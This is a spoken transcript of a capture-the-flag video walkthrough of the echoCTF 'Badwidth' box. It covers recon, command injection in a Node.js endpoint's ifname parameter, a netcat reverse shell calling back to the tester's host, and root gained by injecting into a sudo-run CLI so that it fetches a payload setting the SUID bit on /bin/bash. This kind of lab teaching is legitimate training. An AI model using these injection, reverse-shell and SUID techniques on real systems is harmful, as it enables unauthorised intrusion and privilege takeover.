Hello everyone. Today we are routing Badwidth from echoCTF. I actually did this box about 2.5 weeks ago, so I don't fully remember the exact path, which is a good thing because we'll go through the whole process together from recon to root. I really enjoyed this box. It focuses on the fundamentals of command injection on Linux, which is both essential and a lot of fun. So I already ran the scan not to waste time. This is the scan I ran on the first place to find the ports that are open. I already started the machine and I'm connected with the VPN. Our IP is 10.0.3.0 and as the box suggests, we only have one service. The port is 1337. So in order not to waste time, I'm gonna first of all be organized as always, create a new directory, call it Badwidth, jump into that, create a directory and call it nmap, and now we can run the scan on that port specifically. So we're gonna use sudo nmap double verbose to get to have a verbose output. P for the port, we're gonna specify 1337, SC for default scripts, SV to enumerate the version, and we're gonna save this to nmap default scripts 1337. Let's call it like this. And of course we have to specify the IP, right? So it was 30 or 30, I already forgot. 10.0.3.0. Okay, I hope this is big enough for you guys to see. Till that finishes, gonna be quick. We can read the description that the box is giving to us. So this bandwidth measuring tool is bad, and the HTTP handler is no much better. Okay. So let's create cherry tree to save our nodes in. New instance, call it Badwidth, put some colors there. Our IP is this. Create a subnode nmap, so we save our nmap scan. So let's save the scan. Let's take that portion here. Let's make this bigger. And let's see what we are up against. So there is an HTTP server running on port 337. There it is. And right off the bat we can see it's a Node.js. It's using Node.js Express. Yeah, we can go ahead and save that. Documents, echoCTF, Badwidth. Create a new folder and call it CT, which stands for cherry tree. And call it nodes. Okay, the methods we can use is post get head. That's good to know. Let's highlight this as well. And most of the times, as you see in the previous videos, whenever I find an HTTP server running, I'll first go ahead and visit the server to see what it is. 10.0.30 import 1337, and we get, let's zoom that a bit. Okay, post a network interface if name to display bandwidth utilization. Okay, so this suggests that, as in my understanding, make a post request, because now when we're visiting by default we're doing a get request, right? So we have to make a post request, post a network interface if name, I guess this is the variable we have to, or the parameter we have to use, and then specify an interface, right, to display the bandwidth utilization. I think it would be smart to use burp suite here. For those who don't know what burp suite is, it's a proxy like zap. So let's spin up burp suite. Let's pull that on the side, make it a bit smaller, like this. This is fine. Let's minimize the rest. Okay, and where is burp suite? Is it crashing? Okay, we can go ahead and use curl. I don't think we showed this before, right? So post a network interface, blah blah blah. So let's first of all make a get request 0.1337. So we get this message, and to make a post request with curl, I think is -x to specify the HTTP method, which in our case now it's post. Let's check. Oops, no if name given. So we have to add a parameter as we said before and call it if name. Let's see. To add a parameter with curl, you can just go like, I think it's -data and then, or D, I think, and put if name equals anything. Okay. So as you can see here, we met the requirements. So my first thought here is that we have to guess an interface that exists on the target machine. So it would be a good idea to make a list of interfaces and known interfaces, let's say, and just brute force this parameter. If we do an if config, we can get some idea of how interface names are. So there is LO, which is the loopback, TAN0, which is the one I'm using to connect to the VPN, and F0. So we are sure that we are against a Linux host, a Linux target, as we get the TTL, it's 63. If you don't know, this is a pretty nice technique to fingerprint what OS we are against. If it's, I think, 128 or 127, then most of the times it's a Windows machine. Let's see our nmap. Do we know if it's an Ubuntu or no? We don't. So we can try find a list of let's see if we can find a list of interface names. So interface, let's say network interface names in Linux. Okay, so in Linux, network interface name are used to identify the name and blah blah blah. Traditional names like eth1, eth0, eth1, WLAN, EN. Okay, there's a bunch of those here. Is there a word list we can use? Word list. Okay, we can create a custom one. There it is. From this list right here. So let's see, can we, whoa, okay, that's weird. Okay, we can do it like this. So let's create a word list custom one. So interface names en wl dub ib sl hello eth0 wlan 0 and pos 31 fx. What else do we have here? So I put this one. Let's put this one as well. I think that is one called loop. Let's make wl1, wl2. Let's make if1, if2, and let's do 0, n, en, en1, en2. I think that's enough. So we want to, let's check, we can do this with fav. Let's see, first of all, we're looking to make a post request, and I forgot how to do that with fav. So let's find out. So we're using X for the HTTP method. That's perfect. How do we, and D to post the data. Perfect. I think that's all we need. Cool, let's go ahead and do that. Fav is an amazing tool for fuzzing. You should check it out. So let's do U for the URL 10.0.3.0.1.2.3.7. We want our, with the flag W, we're specifying the word list. When I use the custom one we created, and we have to put the keyword here, fuzz. No, this is not what we want to fuzz. X for the post, we're doing posts, and -d. I'm gonna say if name equals fuzz, and I think that's okay. Let's see. So we got the same thing back, and I don't think we found anything here, but I think it would be ideal to show you guys this in burp. However, my burp is not working, and I don't know why. Yep. So maybe we can reinstall it. Sudo apt purge burp suite. Yeah, let's remove it and reinstall it, and hopefully it works. Sudo apt install burp suite. Okay, let's try running burp suite now. Burp. Oh, maybe we have to update our machine. Update and upgrade. I took the decision to always leave the troubleshooting included when we are doing a machine or anything like that, because when I was watching IPSec to learn how to hack, because the guy is amazing, I'm gonna say it again. I liked when he was troubleshooting stuff because you can learn a lot for that, and it's things that you deal with in this field. So troubleshooting it's in the process. So that's why I took I had the idea to keep that in. If you guys don't want to see all this, just skip the video ahead. So till that finishes, what we can do, it's go and try a new window with curl again. Nope. So what we did, it was curl http 10.0.3.0.7 and xpost default data if name. So whatever we put here, we get back that the interface is being used, but nothing else. If I can type wlan 1 eth01 eth0 eth1, so you see, just it's printing back what we put, but nothing there. So we can go ahead and maybe we can find any new directory that we didn't discover yet. So while we're trying to figure out what's going on with that service, that we can go ahead and fuzz it. Let's create a directory and call it fuzz GoBuster. Let's go to Go and my PC is freezing. Go bin GoBuster. Is it here? Yep. Okay. So can do 3 0. So we're using GoBuster, the directory mode. U, it's for the URL. -w, it's for the word list, and we're saving this in 1337. However, we want to save this in our directory, documents, echoCTF, Badwidth, fuzz. So till that finishes, we can go Okay, we can go ahead and try the rest. So I have to write this again. Oh my god. 10 3 0 0 3 0 1 3 7 x post default data again, if name, blah blah, ls. So if we think about it a bit, the application that is behind this, it's taking our whatever it's next to the equal sign here in the if name, right, in the if name parameter, and it prints it out. So we can say something like echo, let's say, test, and the test is coming out. So what if we do, if we append one quote, then we break the echo, right? Or we do this, double quote, we break the echo again. So with this in mind, we can go ahead and try and see if we can break this functionality so we get a different output rather than our input. So let's make this like this, do ls, ls, and of course we get this because we have to break. Nope. Do I have to do this maybe? So we're getting back ls, ls. So this doesn't break, the single quote doesn't break anything. What about double quotes? Still the same thing. What about, let me think, this, same thing. We need to put some special characters there so we break it. What else? Maybe end. Okay, so by putting end, the double end sign in Linux, when I do ls, we list the files of the folder, the directory we're currently in. But if we do ls end another command, echo test, both commands will run. However, there is a different functionality on an end. So end, the second command works only if the first command was successful. ls, in this case, of course, will be successful, and then we echo test. So in order to try and see if this works, we can go ahead and spin up a fast Python web server, HTTP on port 1337. The reason why I choose 1337 is because I'm sure it's open, as the machine is using it publicly and we can access it already. So let's check our thinking. We can try and do wget, yes, or curl do HTTP 10.11 150. I can see my IP from up here and make test. Nothing happens. Maybe because we are in, we have to put a plus sign because we are in, this is a URL, this is a request, let's say. Nope, nothing. Oh, I didn't put the port, right? 1337. Nope, maybe We try without the plus. Nope. Do we have to encode it? Or maybe specify path as is? We get nothing back. Okay, let's try in pink. That might work. So pink plus 10, 10, 11, 150. And we can use TCP dump. TCP dump specify with dash small I turn 0 our interface ICMP. Let's put dash C here because then we're gonna ping forever. Try this. Nope. Try without plus. Nope. Maybe we need to put a space here. No, maybe with plus. Nope. Okay. What else can we use? There is another special character. Let's see. I think there is a word list that we can use. Command injection special characters. There's Linux. Yep, there it is. So the following special, let me make this bigger. And this is from OWASP. The following special characters can be used for command injections such as pipe, blah blah blah, blah blah blah. So we already checked this. We can check pipe and see what we get here. So can do double pipe, which is OR. Ping now. Nope, I'm getting that back. So I don't think this is the case. Nope. Let's make it with 1. Nope. Let's put this. Nope. So the only command, the only special character that doesn't give us back our input is end, which is a good sign because it means that something is going on here. However, we cannot get the server to reach us, so we have to find out how we're gonna get this one done. Maybe we'll try a different port, right? Let's say 80 and make a curl, maybe. Let's see, curl HTTP 10, 10, 11, 150 test. Nope. Like this. Nope. Maybe we put this. Nope. Okay. Did we manage to? Nice. Let's see if PEP works now after the update and upgrade. And it seems that it works. That's perfect. Okay, next, start. Let's see. Proxy. install Foxy proxy. We want the, not Foxy tab, where's the, what? The basic Foxy proxy is gone. Okay, let's use this one, hopefully that's the same, which is not. Foxy proxy. Foxy proxy is gone. Oh my god. Okay, let's add this one. Hopefully it's not a virus. Appears to be corrupted. Great. I don't have Foxy proxy. Okay, I guess we can use the embedded browser. Okay. That's great. Let's visit 10 030 1337. Let's see, we get the traffic perfect. Can I make this bigger? Interface, display, make this 17 maybe. Okay, I think that's better. Proxy. Is there a way to make this bigger? Guess this is fine. Okay, so let's put that in the P there and make it like this. So we can do right click and change request to post. Also add if name equals blah, send. And we get this as expected. Is there a way to make this bigger? There it is. Make this 70 as well, or maybe bigger, 20. Yep, that's better. So let's try that here. Do indent curl HTTP. Burp will attempt to encode this by default. So we're gonna see if that was our issue with curl. Let's run our web server again on port 1337 and see if we can get something back now. So send, check, nothing. Let's encode this. Nothing back. Let's see. Maybe put a space here. Send. Nothing. Let's like this, maybe. Nope. Nope. Let's try and change the port then. test. Nope. What else can we do? Let's go ahead and check the, where was it? This one. So this is in Windows. Don't know if you can see. It's using pipe here. Where is it? Here. We use this. Oh, right. We can use echo who am I with the $sign and the parentheses. Let's see how that works on the browser. So if we do, okay, so if we do who am I, it's Leon DUC. If we do echo who am I, we're gonna get back who am I. But if we do echo this, we're gonna get back Leon DUC. So maybe we can try doing, let's see, this and ping C. Will this work? Not sure, but let's try it. Curl HTTP. Wait, let's try this here first. So if we do echo curl HTTP 127.0.0.1, which is us, test, and then listen on port Python 3 AT, which is already in use. Where? Here. So undo this. Yep, so it works. So let's go ahead and try that and see if it works here. 10, 10, 11, 150. Do test. Let's see. Go. Nope. But why? Let's put an @ here. Send that again. No. Oh, we got something back. Yeah, it worked. Perfect. So we have command injection on the server. Maybe if we do just ls, we can list the files. I don't know. No, we can't. What about without it? No. ID? No. Can we ping now? Ping C 10, 10, 11, 150. Let's check this. We can go ahead and, like, if it's like this, we can go ahead and highlight this and click Control U, and we'll URL encode it. let's open TCP dump, return 0, ICMP, let's type ping. It seems that now it doesn't work, but curl did work. Oh, it's because I did a mistake here. We need to specify how many pings we want. Now I specified 2 pings. Okay, let's check this out. Yep, and we get the pings back. So we verified that we have command execution on the server. Now let's get a shell. First of all, we can check out if we have, we can try with NC. So we can go ahead and do NC, which is netcat, RIP. The port should be 80, and we specify -E to execute bin bash once connected. Bin bash, and let's close this and do sudo C and BLP and listen on port 80 and see if we get a connection back. Send. We got a connection. Okay, great. So first one down. Do we have the flag here? So let's take a stable shell using our friend here, this guy right here, the robnob. And what? Restart required. Okay. Let's see. echoCTF is gone. Let's pull that back. Okay. robnob. Upgrading simple shells to fully interactive shells. And this guy has a Python script, Python command here, which is spawning shell. But first we have to check if Python exists on the box, which Python, it does exist. Okay, and now we can do, I think it's Control Z, echo row, no, echo, is it stty row minus echo g, export term equals xterm. Nice. And first of all, we're gonna see who we are. We are ETSCTF. Great. What groups are we in? No group, no group, no group. Okay. Let's check what other users are on the box. Let's remove that from the behind. But before we move to privilege escalation, always forget to take good notes. And in the previous videos, I did not take good notes. So I'm gonna write here HTTP 337, make it bold, take this part, put it here. Also, I'm gonna say that we did run GoBuster, but nothing was found, and we can go ahead and check that. So in Badwidth, inside fuzz, we saved our output of GoBuster, nothing was found. Okay. I'm gonna say that when we visited the web server, we got the following message back, which I think, no, is it like this? Yes, no, I don't know, which suggests, let's say, that suggests to make a post request with a parameter if name, and we can go ahead and put the message. Okay, can I say we found out that the parameter was vulnerable to command injection using the following payload, which is if name any command here, do this, and can make this. Okay, that's better. We were able to get a reverse shell using netcat payload NC 10 10 11 150, our port E in bash. Okay, much better. And now we can go ahead and create a new one and call it PE, which stands for privilege escalation. Make this blue. Okay. And let's get back to it. What we ran till now, can go ahead and do. So we are user echoCTF. We've seen that from the ID, but we can also see that from here. We are in no group, and now we want to see what other users exist on this box. We can do that by doing cat to read the etc password D file, and then we can grep for whatever ends to sh. And as you can see, there are 3 users available. So let's take that, put that here. So let's just highlight the commands only. What? Okay. This one. Okay. And we have these 3 users. This is how you're supposed to take notes, by the way. I know it takes time, but it's the best way to see your notes and know exactly what you did before. Okay, so let's continue. After I see what users exist on the box, I go ahead and I have as a rule of thumb to always check the directory I'm in whenever I get a shell. In this time we are in app, right? So let's check what it's in app. So we can see index.js, node modules, package.json. It's good practice to look for configuration files. So let's go ahead and see what's in here. So okay, nothing interesting. It's just how the server is running. But let's see, where did we inject it? There it is. So we escaped this part right here. Our input was going right here, and we were able to execute a command, I think, right? Use interface, yeah. Okay. So let's check if we have any sudo privileges, sudo L, and we do. Let's save that as well. It seems that we do have sudo privileges, not sudo privileges. We can run a command with sudo, and with no password. Put that there. Okay. Let's see what's in here. So the command we can run is located in user local bin N158. Let's see what's that doing. Excuse me for that, but I would like to have less transparent. Right. Let's make it like this. Okay. Let's see. So we can run this. Action param is required. Okay, action param is required. Help. Okay. Show help, show version. Get the same thing. What about version? 1.4.1. Is this a thing? Is that a command that exists, or is it a custom one? Let's search for it. Command tool Linux. So the query command tool is unclear. There is no recognized command or tool with the name. Okay, so this seems to be a custom tool. Can go ahead and check it. Let's hide and see what's inside. So it seems that node, okay, require source index.js. So it's going a directory back into source CLI index.js. So from here it's going a directory back. So let's go here and check if that directory exists. Let's see. Suppose you have a source here, right? Source. Oh, there it is. Okay. So this is a shortcut, a link file. It's called in Linux, but it's the same thing in Windows as a shortcut. So it goes in here, index.js, and we are looking for. So I can't see any source, so maybe it's somewhere in here, maybe we'll go one back, but I don't think can go in here. Wait, where is lib? Lib node modules and 15. So lib node modules, there it is, and 15 8. Okay, let's do sudo l and cut this one more time. So have that here. So let's check this again. So now we are here, source CLI index.js, source CLI, there it is, index.js. So this is a library that the program is using, because as you can see, where is it? There it is, cat index.js. So what I wanted to mention is that if I cut this, you can see require this. So what we are looking at right now, it seems that it's requirement for this tool to work. Let's see what it's doing. In order to read it better, we can open it in Notepad, I guess. Okay, so we don't need this, and we don't need this. So path, require path, yarks, I don't know what's that. Var require init project. I think init project, it's in the same directory. There it is. What's that? Project. Okay, let's see first what this is doing. So var action project, the switch action case init. Oh, so if we specify the command we want to use and say init after it, so if we do this sudo, let's do sudo l, take this, do sudo this, I have to fix the TTY, just give me a minute. So as you can see, the command, it's overlapping, and I don't like this. If you ever face the same issue, what you can do is open a new tab, do sty-a, and we want this here, so rows 37 and columns 125, sty, rows 27, columns 125, and this should fix stuff, right? Yeah, so now our terminal is properly fixed. So let's see that again. So it says here that if we specify this command we want to run, and there's a switch functionality here, if we specify init, this will happen. So if we specify init, it will ask us -- name argument must be passed. Let's try to see if this is the case. There it is. Name argument must be passed. Okay, so we are here, and var seed path, so it joins the current directory. It creates a directory. Let's see. Var target path arg name. Okay, so our input after the name is gonna land here. This is what we control, as we can see. So we'll control the target path variable, seed path, and then it goes in init project using the seed path, this variable, and our variable, and something happens here. However, we can see what happens if we go ahead and cut this. Let's take this and put it here so we analyze it. So after, okay, here is where things get interesting, because as we can see, the script is using shell.js, which means we get to execute commands. So here's the function, this part right here. So what's happening? So it's setting up a project, it seems. Copy sync. It's copying something from the seed path to the current working directory. Installing dependencies, and upon installing the dependencies, shell exec, so we're executing shell commands, and our input name goes here. So if we can escape this, we can actually execute commands as root. Great, let's go ahead and try this. So whoops, sudo l, let's use this again and specify init, right? And I think we have to go to a directory where we can write. However, we are root, so we're supposed to write here anyway. Okay, sudo this init-name test, installing dependencies. So we're here right now, and it's executing this. So it's using sh, it's gonna cd, here now it's test, and npm install. So my thinking now is that, as I said before, if we manage to escape these quotes and add a command here somehow, we're gonna be able to execute commands as root. Let's break this down a bit. So let's assume we can add whatever we want there. Let's take this part right here. So if we do something like this, then execute whatever we want, let's say who am I, and then this again, cd into nowhere, and do this, or maybe and this, we can try like this. So or just this. Let's try this out. So let's think about it a bit. So blah, blah, blah. Can do this, I guess. So when this execute, then execute this before going further. This makes sense, right? Okay, let's try this. As you can see here, the directory is created by root. And if we go inside test, all these are being copied from the seed path. So let's try adding this as our name. Okay, let's try like this. Yep, and we are root. So what we did here is that we closed the single quote. We closed it one step earlier. We append the comma. Then, and we said when you finish from this command, run this command, and then we closed with another single quote, so when pm install will run, but it doesn't run because our command is being executed. So what we can do now is actually get root on the box. So we can go ahead and do let's see, echo or chmod bin bash. Will this work? Bin bash -p. Permission denied. Okay, this didn't work. What can we do? Maybe we can go within into temp, where we can write and try uploading an executable and then running that. So we can go ahead and do this nano payload and we do chmod plus s bin bash. Okay, then Python 3, upload that here, HTTP 10.10.11.150 payload payload. Okay, so we have that here. There it is. And maybe now we can go ahead and run that. Chmod x payload, make it executable, and let's try to run that. However, if we see here, it goes into that directory. Let's try this. So now this is executable. Great. Let's take this and do sudo user local bin and init name and do payload. Nope, let's close that. Payload not found. Okay, go to this. Did this work? Bin bash p. Yay, it worked. We are root. Okay, it errored out, but our payload worked. Let's save that. We managed to inject a payload within the -- name parameter of the custom program that we can run as root can run using sudo. Okay. And I guess that's it, guys. So just to explain what happened here before we close this one out. So the payload that I've used, and let me be clear here, or let's go back here. We are root, right? Yes, we are. We can go to root and read the flag. There's a flag. Okay. So let's exit out from here and read the payload. So what this command does is that I'm making bin bash a sweet binary. I'm acting the sticky bit, let's say. Now if we do lsla on bin bash, there it is. It's the S there. Then after you make this modification on bin bash, you can then run bin bash -p, and because the sticky bit is there, we can utilize bash as root, and we get root. That's all from me, guys. I see you on the next one. Bye.